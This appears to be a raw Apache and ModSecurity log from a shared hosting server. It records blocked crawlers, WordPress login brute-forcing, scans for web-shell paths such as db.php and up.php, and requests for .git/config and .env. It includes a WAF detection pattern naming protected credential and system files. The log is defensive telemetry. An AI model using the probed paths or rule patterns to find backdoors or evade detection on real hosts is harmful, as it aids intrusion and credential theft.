[Tue May 26 14:45:16.505724 2026] [proxy_http:error] [pid 636820:tid 636965] [client 205.210.31.143:63014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:45:16.506318 2026] [proxy:error] [pid 636820:tid 636965] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:45:16.506366 2026] [proxy_http:error] [pid 636820:tid 636965] [client 205.210.31.143:63014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:45:16.663412 2026] [security2:error] [pid 636820:tid 637056] [client 89.221.206.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkpK_r6oOphPch7B-W4gAAAGo"], referer: https://www.anujtradingco.com/
[Tue May 26 14:45:17.696215 2026] [security2:error] [pid 636820:tid 637014] [client 89.221.206.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkpa_r6oOphPch7B-XBwAAAEA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 14:45:18.227575 2026] [security2:error] [pid 636820:tid 637072] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkpa_r6oOphPch7B-XDgAAAHo"]
[Tue May 26 14:45:18.346379 2026] [security2:error] [pid 636820:tid 637027] [client 114.119.139.115:57295] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVkpq_r6oOphPch7B-XIgAAAE0"], referer: http://glorodavionics.com/index.php?route=product/category&path=72_25_110
[Tue May 26 14:45:19.327251 2026] [security2:error] [pid 636820:tid 637035] [client 45.148.10.120:57622] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.staging.unsobered.com"] [uri "/.git/config"] [unique_id "ahVkp6_r6oOphPch7B-XSwAAAFU"]
[Tue May 26 14:45:20.147258 2026] [security2:error] [pid 636820:tid 636971] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkp6_r6oOphPch7B-XYwAAABU"]
[Tue May 26 14:45:22.259907 2026] [security2:error] [pid 636820:tid 636990] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkqa_r6oOphPch7B-XogAAACg"]
[Tue May 26 14:45:22.331376 2026] [security2:error] [pid 636820:tid 637017] [client 89.221.206.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkqq_r6oOphPch7B-XtwAAAEM"], referer: https://anujtradingco.com
[Tue May 26 14:45:22.391549 2026] [core:error] [pid 636820:tid 637009] [client 5.255.231.104:43162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:45:22.391567 2026] [core:error] [pid 636820:tid 637009] [client 5.255.231.104:43162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:45:23.450680 2026] [security2:error] [pid 636820:tid 636962] [client 31.57.184.20:60044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rabbanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahVkq6_r6oOphPch7B-X1AAAAAw"], referer: https://duckduckgo.com/
[Tue May 26 14:45:24.187308 2026] [security2:error] [pid 636820:tid 637063] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkq6_r6oOphPch7B-X6gAAAHE"]
[Tue May 26 14:45:24.653385 2026] [security2:error] [pid 636820:tid 637067] [client 31.57.184.20:62083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rabbanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahVkrK_r6oOphPch7B-YAgAAAHU"]
[Tue May 26 14:45:26.219244 2026] [security2:error] [pid 636820:tid 637040] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkra_r6oOphPch7B-YKAAAAFo"]
[Tue May 26 14:45:28.270945 2026] [security2:error] [pid 636820:tid 637014] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkr6_r6oOphPch7B-YbwAAAEA"]
[Tue May 26 14:45:29.036010 2026] [security2:error] [pid 636820:tid 637027] [client 178.125.117.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVksK_r6oOphPch7B-YfgAAAE0"]
[Tue May 26 14:45:29.474030 2026] [security2:error] [pid 636820:tid 636983] [client 20.65.193.203:48422] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "208.91.198.65"] [uri "/cgi-sys/404.html"] [unique_id "ahVksa_r6oOphPch7B-YiwAAACE"]
[Tue May 26 14:45:30.137416 2026] [security2:error] [pid 636820:tid 636956] [client 178.20.45.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVksq_r6oOphPch7B-YoAAAAAY"], referer: https://anujtradingco.com/top-deejay-headphones/
[Tue May 26 14:45:30.398992 2026] [security2:error] [pid 636820:tid 636952] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVksa_r6oOphPch7B-YmwAAAAI"]
[Tue May 26 14:45:32.238890 2026] [security2:error] [pid 636820:tid 637049] [client 154.161.32.97:57057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVktK_r6oOphPch7B-Y6gAAAGM"]
[Tue May 26 14:45:32.239046 2026] [security2:error] [pid 636820:tid 637049] [client 154.161.32.97:57057] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVktK_r6oOphPch7B-Y6gAAAGM"]
[Tue May 26 14:45:32.303841 2026] [security2:error] [pid 636820:tid 637021] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVks6_r6oOphPch7B-Y4wAAAEc"]
[Tue May 26 14:45:32.311013 2026] [security2:error] [pid 636820:tid 636971] [client 104.207.48.89:15367] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/xmlrpc.php"] [unique_id "ahVks6_r6oOphPch7B-Y0QAAABU"], referer: https://duckduckgo.com/
[Tue May 26 14:45:33.991343 2026] [security2:error] [pid 636820:tid 636984] [client 35.173.255.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVkta_r6oOphPch7B-ZGAAAACI"]
[Tue May 26 14:45:33.991791 2026] [security2:error] [pid 636820:tid 637058] [client 35.173.255.11:46866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVkta_r6oOphPch7B-ZDwAAAGw"]
[Tue May 26 14:45:34.358373 2026] [security2:error] [pid 636820:tid 636958] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkta_r6oOphPch7B-ZFgAAAAg"]
[Tue May 26 14:45:36.394676 2026] [security2:error] [pid 636820:tid 636988] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkt6_r6oOphPch7B-ZaQAAACY"]
[Tue May 26 14:45:36.511769 2026] [security2:error] [pid 636820:tid 636846] [remote 173.252.70.49:60228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.70.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVkuK_r6oOphPch7B-ZggAAHRk"]
[Tue May 26 14:45:37.001887 2026] [security2:error] [pid 636820:tid 636957] [client 47.128.37.28:55944] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahVkua_r6oOphPch7B-ZlQAAAAc"]
[Tue May 26 14:45:37.134033 2026] [security2:error] [pid 636820:tid 636997] [client 64.233.173.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVkua_r6oOphPch7B-ZmgAAAC8"]
[Tue May 26 14:45:37.810026 2026] [security2:error] [pid 636820:tid 637030] [client 216.26.252.154:58057] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkuK_r6oOphPch7B-ZhwAAAFA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:38.039380 2026] [security2:error] [pid 636820:tid 636996] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkua_r6oOphPch7B-ZtAAAAC4"]
[Tue May 26 14:45:39.754875 2026] [security2:error] [pid 636820:tid 637004] [client 209.50.181.243:61941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.181.50.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVku6_r6oOphPch7B-Z7wAAADY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:40.101867 2026] [security2:error] [pid 636820:tid 636887] [remote 57.141.2.7:25100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVkvK_r6oOphPch7B-Z-gAARkI"]
[Tue May 26 14:45:40.600677 2026] [security2:error] [pid 636820:tid 636979] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkvK_r6oOphPch7B-Z_QAAAB0"]
[Tue May 26 14:45:41.902769 2026] [security2:error] [pid 636820:tid 636957] [client 104.207.32.82:48121] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkvK_r6oOphPch7B-aCwAAAAc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:42.564982 2026] [security2:error] [pid 636820:tid 636978] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkvq_r6oOphPch7B-aKAAAABw"]
[Tue May 26 14:45:43.839042 2026] [security2:error] [pid 636820:tid 636906] [remote 74.7.241.58:41176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVkv6_r6oOphPch7B-aWAAADFU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:45:44.177498 2026] [security2:error] [pid 636820:tid 637019] [client 209.50.173.76:44141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkv6_r6oOphPch7B-aNQAAAEU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:44.548868 2026] [security2:error] [pid 636820:tid 637030] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkwK_r6oOphPch7B-aXgAAAFA"]
[Tue May 26 14:45:45.564546 2026] [security2:error] [pid 636820:tid 636969] [client 216.26.234.236:30127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.234.26.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkwa_r6oOphPch7B-ajwAAABM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:45.753200 2026] [security2:error] [pid 636820:tid 637034] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkwa_r6oOphPch7B-akQAAAFQ"]
[Tue May 26 14:45:47.265992 2026] [security2:error] [pid 636820:tid 636989] [client 195.178.110.34:50688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/awstats/.env"] [unique_id "ahVkw6_r6oOphPch7B-a1wAAACc"]
[Tue May 26 14:45:48.075200 2026] [security2:error] [pid 636820:tid 636956] [client 104.207.54.0:33373] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkwq_r6oOphPch7B-azQAAAAY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:48.684716 2026] [security2:error] [pid 636820:tid 637009] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkxK_r6oOphPch7B-a8wAAADs"]
[Tue May 26 14:45:50.189712 2026] [security2:error] [pid 636820:tid 636953] [client 45.3.32.111:25983] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkxa_r6oOphPch7B-bCAAAAAM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:50.666119 2026] [security2:error] [pid 636820:tid 637046] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkxq_r6oOphPch7B-bIwAAAGA"]
[Tue May 26 14:45:51.488713 2026] [security2:error] [pid 636820:tid 637063] [client 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVkx6_r6oOphPch7B-bQwAAAHE"], referer: www.google.com
[Tue May 26 14:45:51.501368 2026] [security2:error] [pid 636820:tid 637007] [client 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVkx6_r6oOphPch7B-bQgAAADk"], referer: www.google.com
[Tue May 26 14:45:51.508653 2026] [security2:error] [pid 636820:tid 636989] [client 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVkx6_r6oOphPch7B-bSQAAACc"]
[Tue May 26 14:45:51.858529 2026] [security2:error] [pid 636820:tid 637054] [client 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/qubktczx.php"] [unique_id "ahVkx6_r6oOphPch7B-bUAAAAGg"], referer: www.google.com
[Tue May 26 14:45:52.194786 2026] [security2:error] [pid 636820:tid 636943] [remote 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVkyK_r6oOphPch7B-bXAAALno"], referer: www.google.com
[Tue May 26 14:45:52.429402 2026] [security2:error] [pid 636820:tid 637024] [client 65.111.7.254:9199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkx6_r6oOphPch7B-bQQAAAEo"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:52.485003 2026] [security2:error] [pid 636820:tid 637027] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkyK_r6oOphPch7B-bVwAAAE0"]
[Tue May 26 14:45:52.943392 2026] [security2:error] [pid 636820:tid 636831] [remote 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVkyK_r6oOphPch7B-baQAAbgo"], referer: www.google.com
[Tue May 26 14:45:53.280906 2026] [security2:error] [pid 636820:tid 636825] [remote 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVkya_r6oOphPch7B-bdgAATwQ"]
[Tue May 26 14:45:53.482366 2026] [security2:error] [pid 636820:tid 636942] [remote 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/rfazhqgh.php"] [unique_id "ahVkya_r6oOphPch7B-bfQAASHk"], referer: www.google.com
[Tue May 26 14:45:53.808114 2026] [security2:error] [pid 636820:tid 636829] [remote 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVkya_r6oOphPch7B-bhgAAEwg"]
[Tue May 26 14:45:54.046715 2026] [security2:error] [pid 636820:tid 637030] [client 45.154.98.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVkyK_r6oOphPch7B-bYwAAUHA"], referer: www.google.com
[Tue May 26 14:45:54.398993 2026] [security2:error] [pid 636820:tid 636824] [remote 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVkyq_r6oOphPch7B-bnwAAYAM"]
[Tue May 26 14:45:54.587523 2026] [security2:error] [pid 636820:tid 636832] [remote 45.154.98.88:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVkyq_r6oOphPch7B-boQAARQs"]
[Tue May 26 14:45:54.684721 2026] [security2:error] [pid 636820:tid 637062] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkyq_r6oOphPch7B-bnQAAAHA"]
[Tue May 26 14:45:54.879736 2026] [security2:error] [pid 636820:tid 636823] [remote 45.154.98.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVkyq_r6oOphPch7B-bowAAYgI"], referer: www.google.com
